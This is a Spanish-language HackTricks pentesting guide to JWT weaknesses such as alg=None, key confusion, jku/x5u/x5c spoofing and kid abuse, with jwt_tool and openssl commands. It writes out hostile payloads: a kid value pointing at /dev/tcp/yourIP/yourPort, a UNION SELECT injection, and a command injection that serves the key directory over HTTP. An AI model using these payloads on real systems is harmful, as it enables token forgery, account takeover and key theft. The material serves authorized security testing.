hacktricks/pentesting-web/hacking-jwt-json-web-tokens.md

19 KiB
Raw Blame History

Vulnerabilidades de JWT (Json Web Tokens)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Consejo para bug bounty: regístrate en Intigriti, una plataforma premium de bug bounty creada por hackers, para hackers. Únete a nosotros en https://go.intigriti.com/hacktricks hoy mismo y comienza a ganar recompensas de hasta $100,000.

{% embed url="https://go.intigriti.com/hacktricks" %}

Parte de esta publicación fue tomada de: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Autor de la gran herramienta para pentestear JWTs https://github.com/ticarpi/jwt_tool

Ganancias rápidas

Ejecuta jwt_tool en modo ¡Todas las pruebas! y espera a que aparezcan las líneas verdes

python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"

Si tienes suerte, la herramienta encontrará algún caso en el que la aplicación web esté verificando incorrectamente el JWT:

Luego, puedes buscar la solicitud en tu proxy o volcar el JWT utilizado para esa solicitud usando la herramienta jwt_:

python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"

Manipular datos sin modificar nada

Puedes manipular los datos dejando la firma tal como está y comprobar si el servidor está verificando la firma. Intenta cambiar tu nombre de usuario a "admin", por ejemplo.

¿Se verifica el token?

  • Si ocurre un mensaje de error, se está verificando la firma: lee cualquier información detallada que pueda filtrar algo sensible.
  • Si la página devuelta es diferente, se está verificando la firma.
  • Si la página es la misma, entonces no se está verificando la firma: ¡es hora de empezar a manipular las reclamaciones del Payload para ver qué puedes hacer!

Origen

Verifica de dónde proviene el token en el historial de solicitudes de tu proxy. Debería ser creado en el servidor, no en el cliente.

  • Si se vio por primera vez que venía del lado del cliente, entonces la clave es accesible para el código del lado del cliente: ¡búscala!
  • Si se vio por primera vez que venía del servidor, entonces todo está bien.

Duración

Verifica si el token dura más de 24 horas... tal vez nunca expire. Si hay un campo "exp", verifica si el servidor lo maneja correctamente.

Fuerza bruta del secreto HMAC

Ver esta página.

Modificar el algoritmo a None (CVE-2015-9235)

Establece el algoritmo utilizado como "None" y elimina la parte de la firma.

Utiliza la extensión de Burp llamada "JSON Web Token" para probar esta vulnerabilidad y cambiar diferentes valores dentro del JWT (envía la solicitud a Repeater y en la pestaña "JSON Web Token" puedes modificar los valores del token. También puedes seleccionar poner el valor del campo "Alg" en "None").

Cambiar el algoritmo de RS256(asimétrico) a HS256(simétrico) (CVE-2016-5431/CVE-2016-10555)

El algoritmo HS256 utiliza la clave secreta para firmar y verificar cada mensaje.
El algoritmo RS256 utiliza la clave privada para firmar el mensaje y utiliza la clave pública para la autenticación.

Si cambias el algoritmo de RS256 a HS256, el código del backend utiliza la clave pública como clave secreta y luego utiliza el algoritmo HS256 para verificar la firma.

Luego, utilizando la clave pública y cambiando RS256 a HS256, podríamos crear una firma válida. Puedes obtener el certificado del servidor web ejecutando esto:

openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem

Nueva clave pública dentro del encabezado

Un atacante incrusta una nueva clave en el encabezado del token y el servidor utiliza esta nueva clave para verificar la firma (CVE-2018-0114).

Esto se puede hacer con la extensión "JSON Web Tokens" de Burp.
(Envía la solicitud a Repeater, dentro de la pestaña JSON Web Token selecciona "CVE-2018-0114" y envía la solicitud).

Suplantación de JWKS

Si el token utiliza una reclamación de encabezado "jku", verifica la URL proporcionada. Esta debería apuntar a una URL que contenga el archivo JWKS que contiene la Clave Pública para verificar el token. Manipula el token para que el valor de jku apunte a un servicio web donde puedas monitorear el tráfico.

Si obtienes una interacción HTTP, ahora sabes que el servidor está intentando cargar claves desde la URL que estás suministrando. Utiliza la opción -S de jwt_tool junto con el argumento -u http://example.com para generar un nuevo par de claves, inyecta tu URL proporcionada, genera un JWKS que contenga la Clave Pública y firma el token con la Clave Privada

Problemas con "kid"

kid es una reclamación opcional de encabezado que contiene un identificador de clave, especialmente útil cuando tienes múltiples claves para firmar los tokens y necesitas buscar la correcta para verificar la firma.

Problemas con "kid" - revelar clave

Si se utiliza la reclamación "kid" en el encabezado, verifica el directorio web en busca de ese archivo o una variación del mismo. Por ejemplo, si "kid":"key/12345", busca /key/12345 y /key/12345.pem en la raíz del sitio web.

Problemas con "kid" - traversing de ruta

Si se utiliza la reclamación "kid" en el encabezado, verifica si puedes utilizar un archivo diferente en el sistema de archivos. Elige un archivo cuyo contenido puedas predecir, o tal vez prueba con "kid":"/dev/tcp/yourIP/yourPort" para probar la conectividad, o incluso algunos payloads de SSRF...
Utiliza la opción -T de jwt_tool para manipular el JWT y cambiar el valor de la reclamación kid, luego elige mantener la firma original

python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""

Usando archivos dentro del host con contenido conocido, también puedes falsificar un JWT válido. Por ejemplo, en sistemas Linux, el archivo /proc/sys/kernel/randomize_va_space tiene el valor establecido en 2. Entonces, al poner esa ruta dentro del parámetro "kid" y usar "2" como la contraseña simétrica para generar el JWT, deberías poder generar un nuevo JWT válido.

Problemas con "kid" - Inyección SQL

En un escenario donde el contenido de "kid" se utiliza para recuperar la contraseña de la base de datos, podrías cambiar la carga útil dentro del parámetro "kid" a: non-existent-index' UNION SELECT 'ATTACKER';-- - y luego firmar el JWT con la clave secreta ATTACKER.

Problemas con "kid" - Inyección de SO

En un escenario donde el parámetro "kid" contiene una ruta al archivo con la clave y esta ruta se está utilizando dentro de un comando ejecutado, podrías obtener RCE y exponer la clave privada con una carga útil como la siguiente: /root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&

Ataques varios

A continuación se presentan debilidades conocidas que se deben probar.

Ataques de retransmisión entre servicios

Algunas aplicaciones web utilizan un servicio JWT de confianza para generar y administrar tokens para ellos. En el pasado, ha habido casos en los que un token generado para uno de los clientes del servicio JWT puede ser aceptado por otro de los clientes del servicio JWT.
Si observas que el JWT se emite o se renueva a través de un servicio de terceros, vale la pena identificar si puedes registrarte en otra cuenta de ese mismo servicio con el mismo nombre de usuario/correo electrónico. Si es así, intenta tomar ese token y reproducirlo en una solicitud a tu objetivo. ¿Es aceptado?

  • Si se acepta tu token, es posible que tengas un problema crítico que te permita falsificar la cuenta de cualquier usuario. SIN EMBARGO, ten en cuenta que si te registras en una aplicación de terceros, es posible que necesites obtener permiso para realizar pruebas más amplias en caso de que entre en un área legal gris.

¿Se verifica exp?

La reclamación de carga útil "exp" se utiliza para verificar la caducidad de un token. Como los JWT se utilizan a menudo en ausencia de información de sesión, es necesario manejarlos con cuidado; en muchos casos, capturar y reproducir el JWT de otra persona te permitirá hacerse pasar por ese usuario.
Una mitigación contra los ataques de reproducción de JWT (que es recomendada por el RFC de JWT) es utilizar la reclamación "exp" para establecer un tiempo de caducidad para el token. También es importante establecer las comprobaciones relevantes en la aplicación para asegurarse de que este valor se procese y el token se rechace cuando haya caducado. Si el token contiene una reclamación "exp" y los límites de tiempo de prueba lo permiten, intenta almacenar el token y reproducirlo después de que haya pasado el tiempo de caducidad. Utiliza la opción -R de jwt_tool para leer el contenido del token, que incluye el análisis de la marca de tiempo y la comprobación de caducidad (marca de tiempo en UTC)

  • Si el token aún se valida en la aplicación, esto puede ser un riesgo de seguridad, ya que el token puede NUNCA caducar.

x5u y jku

jku

jku significa URL del conjunto de claves JWK.
Si el token utiliza una reclamación "jku" en el encabezado, verifica la URL proporcionada. Esta debería apuntar a una URL que contenga el archivo JWKS que contiene la Clave Pública para verificar el token. Manipula el token para que el valor jku apunte a un servicio web donde puedas monitorear el tráfico.

Primero, necesitas crear un nuevo certificado con nuevas claves privadas y públicas.

openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key

Entonces puedes usar, por ejemplo, jwt.io para crear el nuevo JWT con las claves públicas y privadas creadas y apuntando el parámetro jku al certificado creado. Para crear un certificado jku válido, puedes descargar el original y cambiar los parámetros necesarios.

Puedes obtener los parámetros "e" y "n" de un certificado público usando:

from Crypto.PublicKey import RSA
fp = open("publickey.crt", "r")
key = RSA.importKey(fp.read())
fp.close()
print("n:", hex(key.n))
print("e:", hex(key.e))

x5u

URL X.509. Una URI que apunta a un conjunto de certificados públicos X.509 (un estándar de formato de certificado) codificados en formato PEM. El primer certificado en el conjunto debe ser el utilizado para firmar este JWT. Los certificados subsiguientes firman cada uno al anterior, completando así la cadena de certificados. X.509 está definido en RFC 52807. Se requiere seguridad de transporte para transferir los certificados.

Intenta cambiar este encabezado por una URL bajo tu control y verifica si se recibe alguna solicitud. En ese caso, podrías manipular el JWT.

Para forjar un nuevo token utilizando un certificado controlado por ti, necesitas crear el certificado y extraer las claves pública y privada:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem

Entonces puedes usar, por ejemplo, jwt.io para crear el nuevo JWT con las claves públicas y privadas creadas y apuntando el parámetro x5u al certificado .crt creado.

También puedes abusar de ambas vulnerabilidades para SSRFs.

x5c

Este parámetro puede contener el certificado en base64:

Si el atacante genera un certificado autofirmado y crea un token falsificado utilizando la clave privada correspondiente y reemplaza el valor del parámetro "x5c" con el certificado recién generado y modifica los otros parámetros, es decir, n, e y x5t, entonces esencialmente el token falsificado sería aceptado por el servidor.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text

Clave Pública Incrustada (CVE-2018-0114)

Si el JWT tiene incrustada una clave pública como en el siguiente escenario:

Utilizando el siguiente script de nodejs es posible generar una clave pública a partir de esos datos:

const NodeRSA = require('node-rsa');
const fs = require('fs');
n ="ANQ3hoFoDxGQMhYOAc6CHmzz6_Z20hiP1Nvl1IN6phLwBj5gLei3e4e-DDmdwQ1zOueacCun0DkX1gMtTTX36jR8CnoBRBUTmNsQ7zaL3jIU4iXeYGuy7WPZ_TQEuAO1ogVQudn2zTXEiQeh-58tuPeTVpKmqZdS3Mpum3l72GHBbqggo_1h3cyvW4j3QM49YbV35aHV3WbwZJXPzWcDoEnCM4EwnqJiKeSpxvaClxQ5nQo3h2WdnV03C5WuLWaBNhDfC_HItdcaZ3pjImAjo4jkkej6mW3eXqtmDX39uZUyvwBzreMWh6uOu9W0DMdGBbfNNWcaR5tSZEGGj2divE8";
e = "AQAB";
const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));

Es posible generar una nueva clave privada/pública, incrustar la nueva clave pública dentro del token y usarla para generar una nueva firma:

openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key

Puedes obtener el "n" y el "e" utilizando este script de nodejs:

const NodeRSA = require('node-rsa');
const fs = require('fs');
keyPair = fs.readFileSync("keypair.pem");
const key = new NodeRSA(keyPair);
const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));

Finalmente, utilizando la clave pública y privada y los nuevos valores "n" y "e", puedes usar jwt.io para falsificar un nuevo JWT válido con cualquier información.

JTI (JWT ID)

La afirmación JTI (JWT ID) proporciona un identificador único para un token JWT. Se puede utilizar para evitar que el token se reproduzca.
Sin embargo, imagina una situación en la que la longitud máxima del ID sea 4 (0001-9999). La solicitud 0001 y 10001 van a utilizar el mismo ID. Por lo tanto, si el backend incrementa el ID en cada solicitud, podrías abusar de esto para reproducir una solicitud (necesitando enviar 10000 solicitudes entre cada reproducción exitosa).

Afirmaciones registradas de JWT

{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}

Herramientas

{% embed url="https://github.com/ticarpi/jwt_tool" %}


Consejo de recompensa por errores: regístrate en Intigriti, una plataforma premium de recompensas por errores creada por hackers, para hackers. ¡Únete a nosotros en https://go.intigriti.com/hacktricks hoy mismo y comienza a ganar recompensas de hasta $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥